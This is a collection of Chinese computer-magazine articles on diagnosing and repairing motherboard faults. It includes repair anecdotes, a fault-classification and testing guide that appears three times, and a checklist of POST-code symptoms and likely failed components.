    可是主板这么大，元件又这么多从何查起呢？笔者想既然有短路存在，那么它的上一级就应该会发热，笔者不停地快速连接那两根插针，几十次过后笔者开始触摸主板上靠近电源插头附近的元器件，发现CET CEB6030L这个管子热得烫手，看来要么是它坏了要么是它附近元件有短路。用烙铁把它拆下来用万用表一量发现它是好的。像CET CEB6030L这样的管子在CPU插座附近共有两个，看样子是组成对管对CPU的供电起调整作用。顺着走线向下笔者又找到了HIP6018BCB这个小集成块，如果它烧毁短路那么CET CEB6030L势必要发热。笔者用烙铁和吸锡器废了九牛二虎之力把这个集成块给拆了下来，再对主板通电时发现主板可以上电了，CET CEB6030L也不热了，看来HIP6018BCB这个集成块真坏了。

    笔者去了一趟电子市场，运气不错，花了15元钱买了一块相同型号的废板。拆下废板上的HIP6018BCB给朋友的主板焊上去，再对主板通电，这时“诊断卡”上的电源指示灯显示一切正常。装上CPU和内存后按下电源开关，“诊断卡”上数码管的数字开始跳动，从“C1”走到“03”再到“05”又回到“C1”由此开始循环起来，看来主板还不止一个故障。

    翻开“诊断卡”的说明书，上面说“如果不断重复制造测试1至5，可获得8042控制状态”。笔者又上网查找到“8042控制状态”方面的资料，都说得都很含糊，大意是和输入输出这方面有关系。在主板上控制输入输出的IC芯片为WinbondW83977EF-AW。主板通电好长时间而它一点也不热，这么大的一个集成块会坏吗？笔者有点把握不准，不过还是决定换一个试试。拆这个集成块靠笔者的电烙铁和吸锡器已无能为力了，于是笔者到做手机维修的朋友那里，在他的850热风焊台上将芯片拆下，再将废板上的芯片焊上去。笔者再次把CPU和内存都装上，再接上键盘、显示器，打开电源开关，启动后顺利进入Win98，运行程序也正常了。

    经验总结：主板短路故障也是可以自行维修的，仅需要基本的电工知识和简单的设备（例如“主板诊断卡”）。虽然保持电脑机箱内部的清洁是很有必要的，但建议大家在清扫电脑机箱的时候就不要轻易将主板拆下清洗。如果只是除尘，建议可以用小毛刷轻扫再把灰吹出来，有条件的可以用手持式吸尘器清洁，免得惹来不必要的麻烦。


主板I/O供电不足引发的Modem掉线

《一键清理系统垃圾》

主板I/O供电不足引发的Modem掉线

    Modem掉线的情况多发生在线路质量较差、系统局端故障等等情况。然而，近日笔者遇到的掉线却是相当离奇，虽然最终找到问题根源，但仍挂记在心，于是想借助《中国电脑教育报》来与大家共享经验，故写下此文。

    笔者电脑配置是Athlon XP 1600+、捷波屠龙333主板、256MB 现代DDR 266内存、酷鱼4 代80GB硬盘、ATi RADEON LE显卡及DVD、CD-ROM各一，使用半年有余。我一直使用外置Modem上网，虽然是款较早型号的产品，但品质出众，3~4年来一直工作正常。前几日出外旅游，三天后回到家里准备上网查看新闻。拨号很顺利，但浏览网页十来分钟后，突然断线了，开始以为是正常的空闲状态被服务端踢出，并未在意，但接下来几乎每隔一段时间就自动掉线。于是我换用了另一个拨号电话，接入网络后一小时有余也未掉线，心中踏实了许多。第二天，同样的毛病再次发生，这次无论换多少个接入号码都不管用。想到使用了3~4年的Modem，可能是该寿中正寝了，于是决定次日从新购买一个Modem了事。晚上看报纸时，家人突然一句电压不稳引起了我的注意，我突然想到这台电脑的PS2键盘接口经常会出现接触不良的状况，会不会和这个有关系？带着疑问，我拿出工具将主板拆出并临时搭建了一套系统，用万用表一点点的测量电压，竟然发现背板的USB接口、打印机、COM接口及鼠标键盘的PS2接口都有供电不足的情况，稍微对主板加力扭动，有时又能恢复电压供应。继续查找的结果，最终发现在I/O接口部分的耦合电路是虚焊的，于是第二天在朋友的帮助下，修复了虚焊的耦合电路。至此，Modem拨号上网又恢复了正常，再没有出现自动断开的事情了。


主板故障的分析和诊断

《一键清理系统垃圾》

主板故障的分析和诊断

随着主板电路集成度的不断提高及主板价格的降低，其可维修性越来越低。但掌握全面的维修技术对迅速判断主板故障及维修其他电路板仍是十分必要的。下文向大家讲解主板故障的分类、起因和维修。

    一、主板故障的分类

    1．根据对微机系统的影响可分为非致命性故障和致命性故障非致命性故障也发生在系统上电自检期间，一般给出错误信息；致命性故障发生在系统上电自检期间，一般导致系统死机。

    2．根据影响范围不同可分为局部性故障和全局性故障局部性故障指系统某一个或几个功能运行不正常，如主板上打印控制芯片损坏，仅造成联机打印不正常，并不影响其它功能；全局性故障往往影响整个系统的正常运行，使其丧失全部功能，例如时钟发生器损坏将使整个系统瘫痪。

    3．根据故障现象是否固定可分为稳定性故障和不稳定性故障

    稳定性故障是由于元器件功能失效、电路断路、短路引起，其故障现象稳定重复出现，而不稳定性故障往往是由于接触不良、元器件性能变差，使芯片逻辑功能处于时而正常、时而不正常的临界状态而引起。如由于I/O插槽变形，造成显示卡与该插槽接触不良，使显示呈变化不定的错误状态。

    4．根据影响程度不同可分为独立性故障和相关性故障

    独立性故障指完成单一功能的芯片损坏；相关性故障指一个故障与另外一些故障相关联，其故障现象为多方面功能不正常，而其故障实质为控制诸功能的共同部分出现故障引起（例如软、硬盘子系统工作均不正常，而软、硬盘控制卡上其功能控制较为分离，故障往往在主板上的外设数据传输控制即DMA控制电路）。

    5．根据故障产生源可分为电源故障、总线故障、元件故障等

    电源故障包括主板上＋12V、＋5V及＋3.3V电源和Power Good信号故障；总线故障包括总线本身故障和总线控制权产生的故障；元件故障则包括电阻、电容、集成电路芯片及其它元部件的故障。

    二、引起主板故障的主要原因

    1．人为故障：带电插拨I/O卡，以及在装板卡及插头时用力不当造成对接口、芯片等的损害

    2．环境不良：静电常造成主板上芯片（特别是CMOS芯片）被击穿。另外，主板遇到电源损坏或电网电压瞬间产生的尖峰脉冲时，往往会损坏系统板供电插头附近的芯片。如果主板上布满了灰尘，也会造成信号短路等。

    3．器件质量问题：由于芯片和其它器件质量不良导致的损坏。

    三、主板故障检查维修的常用方法

    主板故障往往表现为系统启动失败、屏幕无显示等难以直观判断的故障现象。下面列举的维修方法各有优势和局限性，往往结合使用。

    1．清洁法

    可用毛刷轻轻刷去主板上的灰尘，另外，主板上一些插卡、芯片采用插脚形式，常会因为引脚氧化而接触不良。可用橡皮擦去表面氧化层，重新插接。

    2．观察法

    反复查看待修的板子，看各插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间。遇到有疑问的地方，可以借助万用表量一下。触摸一些芯片的表面，如果异常发烫，可换一块芯片试试。

    3．电阻、电压测量法

    为防止出现意外，在加电之前应测量一下主板上电源＋5V与地（GND）之间的电阻值。最简捷的方法是测芯片的电源引脚与地之间的电阻。未插入电源插头时，该电阻一般应为300Ω，最低也不应低于100Ω。再测一下反向电阻值，略有差异，但不能相差过大。若正反向阻值很小或接近导通，就说明有短路发生，应检查短的原因。产生这类现象的原因有以下几种：

（1）系统板上有被击穿的芯片。一般说此类故障较难排除。例如TTL芯片（LS系列）的＋5V连在一起，可吸去＋5V引脚上的焊锡，使其悬浮，逐个测量，从而找出故障片子。如果采用割线的方法，势必会影响主板的寿命。

    （2）板子上有损坏的电阻电容。

    （3）板子上存有导电杂物。

    当排除短路故障后，插上所有的I/O卡，测量＋5V，＋12V与地是否短路。特别是＋12V与周围信号是否相碰。当手头上有一块好的同样型号的主板时，也可以用测量电阻值的方法测板上的疑点，通过对比，可以较快地发现芯片故障所在。

    当上述步骤均未见效时，可以将电源插上加电测量。一般测电源的＋5V和＋12V。当发现某一电压值偏离标准太远时，可以通过分隔法或割断某些引线或拔下某些芯片再测电压。当割断某条引线或拔下某块芯片时，若电压变为正常，则这条引线引出的元器件或拔下来的芯片就是故障所在。

    4．拔插交换法

    主机系统产生故障的原因很多，例如主板自身故障或I/O总线上的各种插卡故障均
可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。采用交换法实质上就是将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来确定故障原因。

    5．静态、动态测量分析法

    （1）静态测量法：让主板暂停在某一特写状态下，由电路逻辑原理或芯片输出与输入之间的逻辑关系，用万用表或逻辑笔测量相关点电平来分析判断故障原因。

    （2）动态测量分析法：编制专用论断程序或人为设置正常条件，在机器运行过程中用示波器测量观察有关组件的波形，并与正常的波形进行比较，判断故障部位。

    6．先简单后复杂并结合组成原理的判断法

    随着大规模集成电路的广泛应用，主板上的控制逻辑集成度越来越高，其逻辑正确性越来越难以通过测量来判断。可采用先判断逻辑关系简单的芯片及阻容元件，后将故障集中在逻辑关系难以判断的大规模集成电路芯片。

    7．软件诊断法

    通过随机诊断程序、专用维修诊断卡及根据各种技术参数（如接口地址），自编专用诊断程序来辅助硬件维修可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片（如寄存器）状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及基总线运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况。


主板故障的分析及维修

《一键清理系统垃圾》

主板故障的分析及维修

    随着主板电路集成度的不断提高及主板价格的降低，其可维修性越来越低。但掌握全面的维修技术对迅速判断主板故障及维修其他电路板仍是十分必要的。下文向大家讲解主板故障的分类、起因和维修。

一、主板故障的分类

1．根据对微机系统的影响可分为非致命性故障和致命性故障

非致命性故障也发生在系统上电自检期间，一般给出错误信息；致命性故障发生在系统上电自检期间，一般导致系统死机。

2．根据影响范围不同可分为局部性故障和全局性故障

局部性故障指系统某一个或几个功能运行不正常，如主板上打印控制芯片损坏，仅造成联机打印不正常，并不影响其它功能；全局性故障往往影响整个系统的正常运行，使其丧失全部功能，例如时钟发生器损坏将使整个系统瘫痪。

3．根据故障现象是否固定可分为稳定性故障和不稳定性故障

稳定性故障是由于元器件功能失效、电路断路、短路引起，其故障现象稳定重复出现，而不稳定性故障往往是由于接触不良、元器件性能变差，使芯片逻辑功能处于时而正常、时而不正常的临界状态而引起。如由于I/O插槽变形，造成显示卡与该插槽接触不良，使显示呈变化不定的错误状态。

4．根据影响程度不同可分为独立性故障和相关性故障

独立性故障指完成单一功能的芯片损坏；相关性故障指一个故障与另外一些故障相关联，其故障现象为多方面功能不正常，而其故障实质为控制诸功能的共同部分出现故障引起（例如软、硬盘子系统工作均不正常，而软、硬盘控制卡上其功能控制较为分离，故障往往在主板上的外设数据传输控制即DMA控制电路）。

5．根据故障产生源可分为电源故障、总线故障、元件故障等

电源故障包括主板上＋12V、＋5V及＋3.3V电源和Power Good信号故障；总线故障包括总线本身故障和总线控制权产生的故障；元件故障则包括电阻、电容、集成电路芯片及其它元部件的故障。

二、引起主板故障的主要原因

1．人为故障：带电插拨I/O卡，以及在装板卡及插头时用力不当造成对接口、芯片等的损害

2．环境不良：静电常造成主板上芯片（特别是CMOS芯片）被击穿。另外，主板遇到电源损坏或电网电压瞬间产生的尖峰脉冲时，往往会损坏系统板供电插头附近的芯片。如果主板上布满了灰尘，也会造成信号短路等。

3．器件质量问题：由于芯片和其它器件质量不良导致的损坏。

主板故障往往表现为系统启动失败、屏幕无显示等难以直观判断的故障现象。下面列举的维修方法各有优势和局限性，往往结合使用。

1．清洁法

可用毛刷轻轻刷去主板上的灰尘，另外，主板上一些插卡、芯片采用插脚形式，常会因为引脚氧化而接触不良。可用橡皮擦去表面氧化层，重新插接。

2．观察法

    反复查看待修的板子，看各插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间。遇到有疑问的地方，可以借助万用表量一下。触摸一些芯片的表面，如果异常发烫，可换一块芯片试试。

3．电阻、电压测量法

为防止出现意外，在加电之前应测量一下主板上电源＋5V与地（GND）之间的电阻值。最简捷的方法是测芯片的电源引脚与地之间的电阻。未插入电源插头时，该电阻一般应为300Ω，最低也不应低于100Ω。再测一下反向电阻值，略有差异，但不能相差过大。若正反向阻值很小或接近导通，就说明有短路发生，应检查短的原因。产生这类现象的原因有以下几种：

（1）系统板上有被击穿的芯片。一般说此类故障较难排除。例如TTL芯片（LS系列）的＋5V连在一起，可吸去＋5V引脚上的焊锡，使其悬浮，逐个测量，从而找出故障片子。如果采用割线的方法，势必会影响主板的寿命。

（2）板子上有损坏的电阻电容。

（3）板子上存有导电杂物。

当排除短路故障后，插上所有的I/O卡，测量＋5V，＋12V与地是否短路。特别是＋12V与周围信号是否相碰。当手头上有一块好的同样型号的主板时，也可以用测量电阻值的方法测板上的疑点，通过对比，可以较快地发现芯片故障所在。

当上述步骤均未见效时，可以将电源插上加电测量。一般测电源的＋5V和＋12V。当发现某一电压值偏离标准太远时，可以通过分隔法或割断某些引线或拔下某些芯片再测电压。当割断某条引线或拔下某块芯片时，若电压变为正常，则这条引线引出的元器件或拔下来的芯片就是故障所在。

4．拔插交换法

主机系统产生故障的原因很多，例如主板自身故障或I/O总线上的各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。采用交换法实质上就是将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来确定故障原因。

5．静态、动态测量分析法

（1）静态测量法：让主板暂停在某一特写状态下，由电路逻辑原理或芯片输出与输入之间的逻辑关系，用万用表或逻辑笔测量相关点电平来分析判断故障原因。

（2）动态测量分析法：编制专用论断程序或人为设置正常条件，在机器运行过程中用示波器测量观察有关组件的波形，并与正常的波形进行比较，判断故障部位。

6．先简单后复杂并结合组成原理的判断法

随着大规模集成电路的广泛应用，主板上的控制逻辑集成度越来越高，其逻辑正确性越来越难以通过测量来判断。可采用先判断逻辑关系简单的芯片及阻容元件，后将故障集中在逻辑关系难以判断的大规模集成电路芯片。

7．软件诊断法

通过随机诊断程序、专用维修诊断卡及根据各种技术参数（如接口地址），自编专用诊断程序来辅助硬件维修可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片（如寄存器）状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及基总线运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况。


主板故障全面诊断

《一键清理系统垃圾》

主板故障全面诊断

    一、主板故障的分类

    1．根据对微机系统的影响可分为非致命性故障和致命性故障非致命性故障也发生在系统上电自检期间，一般给出错误信息；致命性故障发生 在系统上电自检期间，一般导致系统死机。

    2．根据影响范围不同可分为局部性故障和全局性故障 局部性故障指系统某一个或几个功能运行不正常，如主板上打印控制芯片损坏，仅造成联机打印不正常，并不影响其它功能；全局性故障往往影响整个系统的正常运行，使其丧失全部功能，例如时钟发生器损坏将使整个系统瘫痪。

    3．根据故障现象是否固定可分为稳定性故障和不稳定性故障

    稳定性故障是由于元器件功能失效、电路断路、短路引起，其故障现象稳定重复出现，而不稳定性故障往往是由于接触不良、元器件性能变差，使芯片逻辑功能处于时而正常、时而不正常的临界状态而引起。如由于I/O插槽变形，造成显示卡与该插槽接触不良，使显示呈变化不定的错误状态。

    4．根据影响程度不同可分为独立性故障和相关性故障

    独立性故障指完成单一功能的芯片损坏；相关性故障指一个故障与另外一些故障相关联，其故障现象为多方面功能不正常，而其故障实质为控制诸功能的共同部分出现故障引起（例如软、硬盘子系统工作均不正常，而软、硬盘控制卡上其功能控制较为分离，故障往往在主板上的外设数据传输控制即DMA控制电路）。

    5．根据故障产生源可分为电源故障、总线故障、元件故障等

    电源故障包括主板上＋12V、＋5V及＋3.3V电源和Power Good信号故障；总线故障包括总线本身故障和总线控制权产生的故障；元件故障则包括电阻、电容、集成电路芯片及其它元部件的故障。

    二、引起主板故障的主要原因

    1．人为故障：带电插拨I/O卡，以及在装板卡及插头时用力不当造成对接口、芯片等的损害

    2．环境不良：静电常造成主板上芯片（特别是CMOS芯片）被击穿。另外，主板遇到电源损坏或电网电压瞬间产生的尖峰脉冲时，往往会损坏系统板供电插头附近的芯片。如果主板上布满了灰尘，也会造成信号短路等。

    3．器件质量问题：由于芯片和其它器件质量不良导致的损坏。

三、主板故障检查维修的常用方法

    主板故障往往表现为系统启动失败、屏幕无显示等难以直观判断的故障现象。下面列举的维修方法各有优势和局限性，往往结合使用。

    1．清洁法

    可用毛刷轻轻刷去主板上的灰尘，另外，主板上一些插卡、芯片采用插脚形式，常会因为引脚氧化而接触不良。可用橡皮擦去表面氧化层，重新插接。

    2．观察法

    反复查看待修的板子，看各插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间。遇到有疑问的地方，可以借助万用表量一下。触摸一些芯片的表面，如果异常发烫，可换一块芯片试试。

    3．电阻、电压测量法

    为防止出现意外，在加电之前应测量一下主板上电源＋5V与地（GND）之间的电阻值。最简捷的方法是测芯片的电源引脚与地之间的电阻。未插入电源插头时，该电阻一般应为300Ω，最低也不应低于100Ω。再测一下反向电阻值，略有差异，但不能相差过大。若正反向阻值很小或接近导通，就说明有短路发生，应检查短的原因。产生这类现象的原因有以下几种：

    （1）系统板上有被击穿的芯片。一般说此类故障较难排除。例如TTL芯片（LS系列）的＋5V连在一起，可吸去＋5V引脚上的焊锡，使其悬浮，逐个测量，从而找出故障片子。如果采用割线的方法，势必会影响主板的寿命。

    （2）板子上有损坏的电阻电容。

    （3）板子上存有导电杂物。

    当排除短路故障后，插上所有的I/O卡，测量＋5V，＋12V与地是否短路。特别是＋12V与周围信号是否相碰。当手头上有一块好的同样型号的主板时，也可以用测量电阻值的方法测板上的疑点，通过对比，可以较快地发现芯片故障所在。

    当上述步骤均未见效时，可以将电源插上加电测量。一般测电源的＋5V和＋12V。当发现某一电压值偏离标准太远时，可以通过分隔法或割断某些引线或拔下某些芯片再测电压。当割断某条引线或拔下某块芯片时，若电压变为正常，则这条引线引出的元器件或拔下来的芯片就是故障所在。

4．拔插交换法

    主机系统产生故障的原因很多，例如主板自身故障或I/O总线上的各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。采用交换法实质上就是将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来确定故障原因。

    5．静态、动态测量分析法

    （1）静态测量法：让主板暂停在某一特写状态下，由电路逻辑原理或芯片输出与输入之间的逻辑关系，用万用表或逻辑笔测量相关点电平来分析判断故障原因。

    （2）动态测量分析法：编制专用论断程序或人为设置正常条件，在机器运行过程中用示波器测量观察有关组件的波形，并与正常的波形进行比较，判断故障部位。

    6．先简单后复杂并结合组成原理的判断法

    随着大规模集成电路的广泛应用，主板上的控制逻辑集成度越来越高，其逻辑正确性越来越难以通过测量来判断。可采用先判断逻辑关系简单的芯片及阻容元件，后将故障集中在逻辑关系难以判断的大规模集成电路芯片。

    7．软件诊断法

    通过随机诊断程序、专用维修诊断卡及根据各种技术参数（如接口地址），自编专用诊断程序来辅助硬件维修可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片（如寄存器）状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及基总线运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况。


主板维修常识

《一键清理系统垃圾》

主板维修常识

作为专业硬件维修，板卡维修是非常重要的项目之一。拿过来一块有故障的主板，如何判断具体哪个元器件出问题呢？

引起主板故障的主要原因

    1．人为故障：带电插拨I/O卡，以及在装板卡及插头时用力不当造成对接口、芯片等的损害

    2．环境不良：静电常造成主板上芯片（特别是CMOS芯片）被击穿。另外，主板遇到电源损坏或电网电压瞬间产生的尖峰脉冲时，往往会损坏系统板供电插头附近的芯片。如果主板上布满了灰尘，也会造成信号短路等。

    3．器件质量问题：由于芯片和其它器件质量不良导致的损坏。

清洗

    首先要提醒注意的是，灰尘是主板最大的敌人之一。最好注意防尘，可用毛刷轻轻刷去主板上的灰尘，另外，主板上一些插卡、芯片采用插脚形式，常会因为引脚氧化而接触不良。可用橡皮擦去表面氧化层，重新插接。当然我们可以用三氯乙烷--挥发性能好，是清洗主板的液体之一。还有就是在突然掉电时，要马上关上计算机，以免又突然来电把主板和电源烧毁。流程。

BIOS

    由于BIOS设置不当，如果超频……可以跳线清处，摘重新设置。如果BIOS损坏，如病毒侵入……，可以重写BIOS。因为BIOS是无法通过仪器测的，它是以软件形式存在的，为了排除一切可能导致主板出现问题的原因，最好把主板BIOS刷一下。

拔插交换

    主机系统产生故障的原因很多，例如主板自身故障或I/O总线上的各种插卡故障均可导致系统运行不正常。采用拔插维修法是确定故障在主板或I/O设备的简捷方法。该方法就是关机将插件板逐块拔出，每拔出一块板就开机观察机器运行状态，一旦拔出某块后主板运行正常，那么故障原因就是该插件板故障或相应I/O总线插槽及负载电路故障。若拔出所有插件板后系统启动仍不正常，则故障很可能就在主板上。采用交换法实质上就是将同型号插件板，总线方式一致、功能相同的插件板或同型号芯片相互芯片相互交换，根据故障现象的变化情况判断故障所在。此法多用于易拔插的维修环境，例如内存自检出错，可交换相同的内存芯片或内存条来确定故障原因。

观看

    拿到一块有故障主板先用眼睛扫一下，看看没有没烧坏的痕迹，外观有没损坏，看各插头、插座是否歪斜，电阻、电容引脚是否相碰，表面是否烧焦，芯片表面是否开裂，主板上的铜箔是否烧断。还要查看是否有异物掉进主板的元器件之间。遇到有疑问的地方，可以借助万能表量一下。触摸一些芯片的表面，如果异常发烫，可换一块芯片试试。

（1）．如果连线断，我们可以用刀把断线处的漆刮干净，在露出的导线处涂上蜡，再用针顺着走线把蜡划去，接下来就是在上面滴上硝酸银溶液。接着就要用万能表来确认是否把断点连接好。就这样一个一个的，把断点接好就可以了。注意要一个一个的连，切不要心急，象主板上有的地方的走线间的距离很小，弄不好就会短路了。

（2）．如果是电解电容，可以找匹配的换掉。

万能表、示波器工具

    用示万能表、波器测主板各元器件供电的情况。一个是检测主板是否对这部分供电，再有就是供电的电压是否正常。

电阻、电压测量：
    电源故障包括主板上＋12V、＋5V及＋3.3V电源和Power Good信号故障；总线故障包括总线本身故障和总线控制权产生的故障；元件故障则包括电阻、电容、集成电路芯片及其它元部件的故障。

    为防止出现意外，在加电之前应测量一下主板上电源＋5V与地（GND）之间的电阻值。最简捷的方法是测芯片的电源引脚与地之间的电阻。未插入电源插头时，该电阻一般应为300Ω，最低也不应低于100Ω。再测一下反向电阻值，略有差异，但不能相差过大。若正反向阻值很小或接近导通，就说明有短路发生，应检查短的原因。产生这类现象的原因有以下几种：

    （1）系统板上有被击穿的芯片。一般说此类故障较难排除。例如TTL芯片（LS系列）的＋5V连在一起，可吸去＋5V引脚上的焊锡，使其悬浮，逐个测量，从而找出故障片子。如果采用割线的方法，势必会影响主板的寿命。

    （2）板子上有损坏的电阻电容。

    （3）板子上存有导电杂物。

    当排除短路故障后，插上所有的I/O卡，测量＋5V，＋12V与地是否短路。特别是＋12V与周围信号是否相碰。当手头上有一块好的同样型号的主板时，也可以用测量电阻值的方法测板上的疑点，通过对比，可以较快地发现芯片故障所在。

    当上述步骤均未见效时，可以将电源插上加电测量。一般测电源的＋5V和＋12V。当发现某一电压值偏离标准太远时，可以通过分隔法或割断某些引线或拔下某些芯片再测电压。当割断某条引线或拔下某块芯片时，若电压变为正常，则这条引线引出的元器件或拔下来的芯片就是故障所在。 程序、诊断卡诊断

    通过随机诊断程序、专用维修诊断卡及根据各种技术参数（如接口地址），自编专用诊断程序来辅助硬件维修可达到事半功倍之效。程序测试法的原理就是用软件发送数据、命令，通过读线路状态及某个芯片（如寄存器）状态来识别故障部位。此法往往用于检查各种接口电路故障及具有地址参数的各种电路。但此法应用的前提是CPU及基总线运行正常，能够运行有关诊断软件，能够运行安装于I/O总线插槽上的诊断卡等。编写的诊断程序要严格、全面有针对性，能够让某些关键部位出现有规律的信号，能够对偶发故障进行反复测试及能显示记录出错情况。


主板维修资料

《一键清理系统垃圾》

主板维修资料

LBHIDDEN[0]LBHIDDEN[watermark]1、目检：
1）PCB线路开路、短路
2）芯片假焊，电容爆裂
3）插槽倒位短路。
4）针帽跳线
2、插上电源短路触发（不通电）解决方案：
1）CMOS电池电压是否够
2）32.768晶体是否起振
3）CMOS针帽
4）ATX的5VSB到南桥后为3.3V
5）POWER　SW够3.5—5V电平.
6）POWER ON线路
7）74HCT系列门控芯片
8）I/O芯片
9）南桥或ICH坏
10）正负12V正负5V、3.3V的基本电压对地短路
3、插上负载测量电压（电压修复）：
1）VCORE，有双杠波，（稳压IC、稳压管）
2）VTT（1.5V）
3）VDD(2.5V)
4）VREF(1V)
5）VCC(早期为5V)
6）VCC(3.3V)
7）AGP4X(1.5V)
8）DIMM(3.3V\2.5V)
9）810以上芯片组（3.3V\1.8V\0.9V）
4、时钟修复：
1）供电电压3.3V\2.5V(P4\K7只有3.3V)
2）14.318M晶体是否起振
3）时钟发生器
4）北桥或GMCH坏(反馈时钟)
5）586级供电为3.5V
5、复位修复：
1）PG信号3.5—5V电平
2）74HCT系列门控芯片(复位发生器)
3）南桥或ICH
4）北桥或GMCH
5）清CMOS
6、插CPU执行第一个周期,CPU选中BIOS的CS&#35;信号;无片选,不开机(数码跑00、FF)修复：
1）CPU座上的字节允许信号线BE
2）PG信号线、BRDY信号
3）INIT初始化信号
4）INTR、NMI
5）CPU插槽接触不良
6）CPU周边供电电路
7）南、北桥坏
7、测量BIOS上的使能信号（OE&#35;），脉冲波形；跑FF、00、F0、C0不开机的修复：
1）BIOS物理损坏或CMOS周边电路
2）BIOS资料坏
3）BIOS引脚线路
8、执行POST自检，进入内存，不开机，数码跑C0、E0、D1、D0、FF、OO：
1）BIOS总线
2）CPU局部总线A、D线有无开路、短路
3）PCI总线
4）ISA总线
5）显（D1）时，COM口的控制芯片坏或32.768晶体坏.
9、插内存，跑C1、C6、D3、D4为不读内存：
1）内存插槽接触不良
2）供电DIMM3.3V
3）内存时钟
4）MA、MD、RAS、CAS
5）BIOS
6）F244、F245
7）I/O芯片
8）CPU的A、D线
9）北桥（GMCH）坏
10）CPU插槽接触不良
11）分频坏
10、执行POST自检：跑2A、26、0B、0D、25、C3、ED、DB、D7、D8、D9、27、B1、05、07、ED、快显示了，但不显示的修复：
1）BIOS坏
2）北桥、GMCH坏
3）南桥、ICH坏
4）F244、F245（缓冲器）
5）分频器坏
6）74系列门控芯片坏
7）I/O坏
8）CPU的D线高阻
9）CACHE坏（586）
注：跑ED90%是BIOS出错；跑C3为BIOS电路或I/O或南桥坏。修复后跑2A、0B、0D、26表示即将显示或显示，跑31已显示。
11、插显卡应该显示但不显示，跑31---85：
内置显卡不显示：
1）供电2.5V(一般在输出接口上)
2）VGA时钟(北桥时钟)
3）行、场波形
4）北桥或GMCH坏
PCI显卡不显示：
1）BIOS
2）FRAME、C/BE、
3）时钟信号
4）插槽接触不良
5）REQ
6）分频器坏
AGP不显示：
1）AGP插槽接触不良
2）供电电压（3.3---1.5V）
3）时钟、复位
4）REQ
5）分频器坏
12、开机死机：
1）BIOS出错
2）CPU频率出错
3）内存K数出错
4）F244、F245
5）分频器坏
13、键盘失效：
1）供电
2）KBCLK、KBDATA
3）I/O芯片坏
4）F244、开路、短路
14、运行CMOS设置程序：
设置后不显示：
1）VCORE、稳压IC坏
2）74HCT门控
3）分频器
4）南桥
设置后不保存：
1）CMOS电池
2）32.768晶体是否起振
3）CMOS针帽
4）I/O芯片
5）南桥或ICH
6）5VSB和CMOS电池是否送到南桥
15、显示出错跑41：
1）BIOS
2）南桥
16、不读A：
1）ISA槽B6、B11、B12、B22、B26、B27
2）I/O芯片的时钟
3）FDC接口
4）F32门控芯片
5）CPU的A线
6）南桥或ICH
7）BIOS设置
17、不进C：
1）BIOS磁盘自举功能
2）ISA槽IRQ14、IRQ15、D6、D7
3）IDE接口
4）南桥或ICH坏
5）清CMOS
6）BIOS程序

18、COM口不能用：
1）COM电压（正负12V、5V）
2）ISA的B24、B25
3）COM口引脚到（75185、75232、6571）
4）I/O
5）南桥工ICH
19、不能打印：
1）ISA槽上B21、B23
2）LPT接口
3）I/O
4）南桥或ICH
5）排容漏电
20、关不了系统：
5VSB低阻或对地短路。
POWER　ON低阻或对地短路。
74系列门控芯片坏。
I/O芯片坏。
南桥或ICH坏。


主板无法识别硬盘灰尘是凶手

《一键清理系统垃圾》

主板无法识别硬盘灰尘是凶手

《中国电脑教育报》石山

    朋友的一台兼容机最近经常无法启动，偶尔能进入系统也是频繁死机，无奈之下只好向本“大师”求援。

